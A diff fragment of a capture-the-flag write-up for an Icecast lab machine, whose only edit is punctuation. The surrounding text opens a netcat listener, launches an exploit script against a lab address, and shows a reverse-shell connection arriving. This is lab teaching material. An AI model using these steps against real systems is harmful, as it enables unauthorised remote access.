paperboygold/writeups/ice.md

 ```

 At this stage it's time to set up our netcat listener:

 ```
 nc -lvnp 420
 listening on [any] 420 ...
 ```

 And now we run the exploit:

 ```
 python3 icecast.py 10.10.170.34 8000

 Done!
 ```

-If we look back at our netcat listener now...
+If we look back at our netcat listener now:

 ```
 listening on [any] 420 ...
 connect to [10.4.18.56] from (UNKNOWN) [10.10.170.34] 49284